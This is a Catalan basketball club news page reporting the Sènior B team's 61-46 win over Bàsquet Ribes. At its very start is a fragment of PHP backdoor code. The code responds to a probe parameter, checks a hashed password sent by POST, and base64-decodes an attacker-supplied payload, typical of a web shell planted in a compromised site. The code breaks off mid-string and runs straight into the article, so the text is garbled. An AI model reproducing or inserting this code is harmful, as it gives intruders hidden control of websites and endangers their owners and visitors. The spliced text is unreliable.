function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Sènior B guanya i mira a la part alta de la classificació (61-46) - Tgn Bàsquet Club -

El Sènior B guanya i mira a la part alta de la classificació (61-46)

Updated: desembre 1, 2023

El passat dissabte el nostre sènior va jugar contra el Bàsquet Ribes a casa on va guanyar per 61 a 46 i va aconseguir la setena victòria de la temporada.

El partit va començar molt de cara per les liles amb un ritme d’anotació molt ràpid i bons percentatges que sumat a una bona defensa va fer que acabéssim el primer període amb un parcial de 20 a 10.

L’encert des de la línia de tres punts per part del Bàsquet Ribes i un ritme d’atac més lent provocat per la zona de l’equip contrari va fer que el segon quart ens fos desfavorable i vam arribar a la mitja part amb un avantatge de cinc punts, 32 a 27.

La segona part en general va mantenir la tònica de partit lent que va proposar l’altre equip, però malgrat això i els entrebancs l’equip va aconseguir continuar anotant i sumant arribant al final del partit amb el marcador favorable de 61 a 46.